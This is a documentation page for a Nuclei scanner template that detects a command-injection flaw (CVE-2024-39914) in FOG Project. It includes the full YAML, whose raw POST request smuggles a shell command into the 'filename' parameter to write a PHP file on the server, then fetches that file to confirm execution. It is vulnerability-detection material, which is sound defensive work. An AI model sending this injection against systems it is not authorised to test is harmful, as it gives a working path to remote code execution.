Skip to content
Nuclei Templates

FOG Project < 1.5.10.34 - Remote Command Execution

ID: CVE-2024-39914

Severity: critical

Author: s4e-io

Tags: cve,cve2024,rce,fog

Description

Section titled “Description”

FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.

YAML Source

Section titled “YAML Source”
id: CVE-2024-39914


info:
  name: FOG Project < 1.5.10.34 - Remote Command Execution
  author: s4e-io
  severity: critical
  description: |
    FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.
  remediation: Fixed in 1.5.10.34
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39914
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39914
    - https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j
    - https://blog.csdn.net/qq_39894062/article/details/140550009
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39914
    cwe-id: CWE-77
    epss-score: 0.00043
    epss-percentile: 0.09367
  metadata:
    vendor: fogproject
    product: fogproject
    fofa-query: icon_hash="-1952619005"
  tags: cve,cve2024,rce,fog


variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"
  num: "{{rand_int(1000, 9999)}}"


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /management/export.php?filename=$(echo+'<?php+echo+md5({{num}});+?>'+>+{{filename}}.php)&type=pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        fogguiuser=fog&nojson=2


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"No HTML files!","HTMLDOC")'
          - 'contains(content_type, "application/pdf")'
          - "status_code == 200"
        condition: and
        internal: true


  - raw:
      - |
        GET /management/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"{{md5(num)}}")'
          - 'contains(content_type, "text/html")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402206bc0e1c327ad38abff5ada06d6c86d354cee6975a212f45c5df2849d2cb968d902200d3ae351fd1ae6b326c4dce934ef08fb316768e92ed43cc366f05994cbc50317:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-39914.yaml"

View on Github